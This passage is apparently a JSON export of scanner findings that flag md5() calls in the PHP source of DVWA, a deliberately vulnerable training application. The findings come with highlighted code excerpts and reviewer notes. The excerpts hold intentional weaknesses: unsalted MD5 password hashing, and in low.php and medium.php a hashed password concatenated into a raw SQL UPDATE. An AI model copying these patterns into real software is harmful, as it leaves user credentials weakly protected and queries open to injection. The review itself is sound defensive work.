function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">15:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check that the current password is correct\n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$data</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$db</span><span class=\"token 
operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">prepare</span><span class=\"token punctuation\">(</span> '<span class=\"token keyword\">SELECT</span> password FROM users WHERE user <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">:</span>user<span class=\"token punctuation\">)</span> <span class=\"token operator\">AND</span> password <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">:</span>password<span class=\"token punctuation\">)</span> LIMIT <span class=\"token number\">1</span><span class=\"token comment\" spellcheck=\"true\">;' );</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">bindParam</span><span class=\"token punctuation\">(</span> <span class=\"token string\">':user'</span><span class=\"token punctuation\">,</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>PARAM_STR <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">bindParam</span><span class=\"token punctuation\">(</span> <span class=\"token string\">':password'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_curr</span><span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>PARAM_STR <span class=\"token 
punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 15,
  "start": 10,
  "end": 21,
  "severity": "unknown",
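  "note": "Line 15 hashes the submitted current password with md5() and the prepared SELECT on line 18 compares it with the stored value, so stored passwords are unsalted MD5. MD5 is fast and unsuited to password storage; PHP password_hash() and password_verify() are the usual replacement."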
 },
 {
  "id": 157,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/impossible.php",
  "filetype": "php",
  "search": "\\smd5\\s*\\(",
  "match": "<span class=\"line-number\">23:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> both new passwords match <span class=\"token operator\">and</span> does the current password match the user<span class=\"token operator\">?</span>\n<span class=\"line-number\">24:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">rowCount</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">1</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">25:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> It does!\n<span class=\"line-number\">26:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">27:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span 
class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! 
This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">28:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">29:</span> \n<span class=\"line-number\">30:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database <span class=\"token keyword\">with</span> new password\n<span class=\"line-number\">31:</span> \t\t<span class=\"token variable\">$data</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$db</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">prepare</span><span class=\"token punctuation\">(</span> 'UPDATE users SET password <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">:</span>password<span class=\"token punctuation\">)</span> WHERE user <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">:</span>user<span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;' );</span>\n<span class=\"line-number\">32:</span> \t\t<span class=\"token variable\">$data</span><span 
class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">bindParam</span><span class=\"token punctuation\">(</span> <span class=\"token string\">':password'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span><span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>PARAM_STR <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">33:</span> \t\t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">bindParam</span><span class=\"token punctuation\">(</span> <span class=\"token string\">':user'</span><span class=\"token punctuation\">,</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>PARAM_STR <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 28,
  "start": 23,
  "end": 34,
  "severity": "unknown",
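  "note": "Line 28 stores the new password as md5() of the input through a prepared UPDATE. The query is parameterised, but the stored value is still an unsalted MD5 hash; a salted, slow scheme such as PHP password_hash() is the usual fix."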
 },
 {
  "id": 163,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/low.php",
  "filetype": "php",
  "search": "\\smd5\\s*\\(",
  "match": "<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> the passwords match<span class=\"token operator\">?</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">10:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">11:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token 
string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">12:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update the database\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span 
class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">16:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token 
punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> ",
  "line": 12,
  "start": 7,
  "end": 18,
  "severity": "unknown",
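  "note": "Line 12 hashes the new password with md5() and line 15 concatenates the result into the UPDATE string. The md5 match flags unsalted, fast password hashing; prefer PHP password_hash() and pass the value as a bound parameter."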
 },
 {
  "id": 170,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/medium.php",
  "filetype": "php",
  "search": "\\smd5\\s*\\(",
  "match": "<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> the passwords match<span class=\"token operator\">?</span>\n<span class=\"line-number\">11:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">12:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">13:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token 
string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">14:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update the database\n<span class=\"line-number\">17:</span> \t\t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span 
class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">18:</span> \t\t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token 
punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> ",
  "line": 14,
  "start": 9,
  "end": 20,
  "severity": "unknown",
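  "note": "Line 14 hashes the new password with md5() and line 17 concatenates the result into the UPDATE string, the same pattern as low.php. The stored value is an unsalted MD5 hash; prefer PHP password_hash() and a bound parameter."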
 },
 {
  "id": 264,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/impossible.php",
  "filetype": "php",
  "search": "\\smd5\\s*\\(",
  "match": "<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$uploaded_tmp</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'tmp_name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \n<span class=\"line-number\">15:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$target_path</span>   <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'hackable/uploads/'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span><span class=\"token variable\">$target_file</span>   <span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'-'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">18:</span> \t<span class=\"token variable\">$target_file</span>   <span class=\"token 
operator\">=</span>  <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token function\">uniqid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_name</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_ext</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$temp_file</span>     <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">ini_get</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'upload_tmp_dir'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">''</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">sys_get_temp_dir</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">ini_get</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'upload_tmp_dir'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t<span class=\"token variable\">$temp_file</span>    <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> 
DIRECTORY_SEPARATOR <span class=\"token punctuation\">.</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token function\">uniqid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_name</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_ext</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \n<span class=\"line-number\">22:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is it an image<span class=\"token operator\">?</span>\n<span class=\"line-number\">23:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">strtolower</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">'jpg'</span> || <span class=\"token function\">strtolower</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">'jpeg'</span> || <span class=\"token function\">strtolower</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">'png'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span>",
  "line": 18,
  "start": 13,
  "end": 24,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 265,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/impossible.php",
  "filetype": "php",
  "search": "\\smd5\\s*\\(",
  "match": "<span class=\"line-number\">15:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$target_path</span>   <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'hackable/uploads/'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span><span class=\"token variable\">$target_file</span>   <span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'-'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$target_file</span>   <span class=\"token operator\">=</span>  <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token function\">uniqid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_name</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_ext</span><span class=\"token 
comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$temp_file</span>     <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">ini_get</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'upload_tmp_dir'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">''</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">sys_get_temp_dir</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">ini_get</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'upload_tmp_dir'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">20:</span> \t<span class=\"token variable\">$temp_file</span>    <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> DIRECTORY_SEPARATOR <span class=\"token punctuation\">.</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token function\">uniqid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_name</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">.</span> <span 
class=\"token variable\">$uploaded_ext</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">21:</span> \n<span class=\"line-number\">22:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is it an image<span class=\"token operator\">?</span>\n<span class=\"line-number\">23:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">strtolower</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">'jpg'</span> || <span class=\"token function\">strtolower</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">'jpeg'</span> || <span class=\"token function\">strtolower</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">'png'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span>\n<span 